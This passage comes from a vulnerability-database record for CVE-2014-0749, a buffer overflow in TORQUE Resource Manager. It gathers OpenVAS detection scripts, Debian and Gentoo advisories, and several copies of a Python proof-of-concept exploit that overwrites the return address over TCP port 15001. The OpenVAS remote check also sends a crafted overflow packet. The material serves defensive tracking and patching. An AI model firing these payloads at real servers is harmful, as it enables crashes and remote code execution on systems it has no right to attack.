exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-07-21T21:59:22", "description": "This host is running TORQUE Resource Manager and is prone to stack buffer\n overflow vulnerability.", "cvss3": {}, "published": "2014-05-29T00:00:00", "type": "openvas", "title": "TORQUE Resource Manager Stack Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310804456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# TORQUE Resource Manager Stack Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804456\");\n script_version(\"2020-07-16T08:52:35+0000\");\n script_cve_id(\"CVE-2014-0749\");\n script_bugtraq_id(67420);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 08:52:35 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-29 14:39:49 +0530 (Thu, 29 May 2014)\");\n script_name(\"TORQUE Resource Manager Stack Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(15001);\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/May/75\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126651\");\n script_xref(name:\"URL\", value:\"https://labs.mwrinfosecurity.com/advisories/2014/05/14/torque-buffer-overflow/\");\n\n script_tag(name:\"summary\", value:\"This host is running TORQUE Resource Manager and is prone to stack buffer\n overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send crafted request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error within the 'disrsi_()' function\n (src/lib/Libdis/disrsi_.c), which can be exploited to cause a stack-based buffer overflow.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute arbitrary code\n and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"TORQUE versions 2.5 through 2.5.13.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TORQUE 4.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nport = 15001;\nif(!get_port_state(port))\n exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nsend(socket:soc, data:\"--help\");\nres = recv(socket:soc, length:1024);\nclose(soc);\n\nif(!res || \"DIS based Request Protocol MSG=cannot decode message\" >!< res)\n exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nBadData = raw_string(0x33, 0x31, 0x34, 0x33, 0x31) +\n crap(data: raw_string(0x00), length: 135) +\n raw_string(0xc0, 0x18, 0x76, 0xf7, 0xff,\n 0x7f, 0x00, 0x00);\nsend(socket:soc, data:BadData);\nclose(soc);\n\nsleep(1);\n\nsoc = open_sock_tcp(port);\nif(!soc) {\n security_message(port:port);\n exit(0);\n}\n\nclose(soc);\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:13", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2936-1 (torque - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702936", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2936.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2936-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702936\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0749\");\n script_name(\"Debian Security Advisory DSA 2936-1 (torque - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-23 00:00:00 +0200 (Fri, 23 May 2014)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2936.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"torque on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\");\n script_tag(name:\"summary\", value:\"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:08", "description": "Gentoo Linux Local Security Checks GLSA 201412-47", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201412-47", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4925", "CVE-2013-4319", "CVE-2011-2907", "CVE-2013-4495", "CVE-2014-0749", "CVE-2011-2193"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-47.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121333\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:24 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-47\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in TORQUE Resource Manager. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-47\");\n script_cve_id(\"CVE-2011-2193\", \"CVE-2011-2907\", \"CVE-2011-4925\", \"CVE-2013-4319\", \"CVE-2013-4495\", \"CVE-2014-0749\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-47\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(\"ge 4.1.7\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(\"ge 2.5.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(), vulnerable: make_list(\"lt 4.1.7\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:18:52", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0749"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86762", "id": "SSV:86762", "sourceData": "\n #!/usr/bin/env python\r\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\r\n# Date: 27 May 2014\r\n# Exploit Author: bwall - @botnet_hunter\r\n# Vulnerability discovered by: MWR Labs\r\n# CVE: CVE-2014-0749\r\n# Vendor Homepage: http://www.adaptivecomputing.com/\r\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\r\n# Version: 2.5.13\r\n# Tested on: Manjaro x64\r\n# Description:\r\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\r\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\r\n# data, the next digits are the actual size of the buffer.\r\n#\r\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\r\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\r\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\r\n\r\nimport socket\r\n\r\n\r\nip = "172.16.246.177"\r\nport = 15001\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((ip, port))\r\n\r\noffset = 143\r\nheader = str(len(str(offset))) + str(offset) + '1'\r\n\r\npacket = header\r\npacket += "\\x00" * (140 - len(packet))\r\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\r\n\r\ns.sendall(packet)\r\ndata = s.recv(1024)\r\ns.close()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86762"}], "ubuntucve": [{"lastseen": "2023-09-21T06:47:32", "description": "Stack-based buffer overflow in lib/Libdis/disrsi_.c in Terascale\nOpen-Source Resource and Queue Manager (aka TORQUE Resource Manager) 2.5.x\nthrough 2.5.13 allows remote attackers to execute arbitrary code via a\nlarge count value.", "cvss3": {}, "published": "2014-05-16T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0749", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-16T00:00:00", "id": "UB:CVE-2014-0749", "href": "https://ubuntu.com/security/CVE-2014-0749", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:28:50", "description": "\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\n\nWe recommend that you upgrade your torque packages.\n\n\n", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "osv", "title": "torque - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2022-07-21T05:48:17", "id": "OSV:DSA-2936-1", "href": "https://osv.dev/vulnerability/DSA-2936-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-03T03:40:45", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2014-06-01T00:00:00", "type": "zdt", "title": "TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-06-01T00:00:00", "id": "1337DAY-ID-22301", "href": "https://0day.today/exploit/description/22301", "sourceData": "#!/usr/bin/env python\r\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\r\n# Date: 27 May 2014\r\n# Exploit Author: bwall - @botnet_hunter\r\n# Vulnerability discovered by: MWR Labs\r\n# CVE: CVE-2014-0749\r\n# Vendor Homepage: http://www.adaptivecomputing.com/\r\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\r\n# Version: 2.5.13\r\n# Tested on: Manjaro x64\r\n# Description:\r\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\r\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\r\n# data, the next digits are the actual size of the buffer.\r\n#\r\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\r\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\r\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\r\n \r\nimport socket\r\n \r\n \r\nip = \"172.16.246.177\"\r\nport = 15001\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((ip, port))\r\n \r\noffset = 143\r\nheader = str(len(str(offset))) + str(offset) + '1'\r\n \r\npacket = header\r\npacket += \"\\x00\" * (140 - len(packet))\r\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\r\n \r\ns.sendall(packet)\r\ndata = s.recv(1024)\r\ns.close()\n\n# 0day.today [2018-03-03] #", "sourceHref": "https://0day.today/exploit/22301", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:13", "description": "", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "packetstorm", "title": "TORQUE Resource Manager 2.5.13 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "PACKETSTORM:126855", "href": "https://packetstormsecurity.com/files/126855/TORQUE-Resource-Manager-2.5.13-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub \n# Date: 27 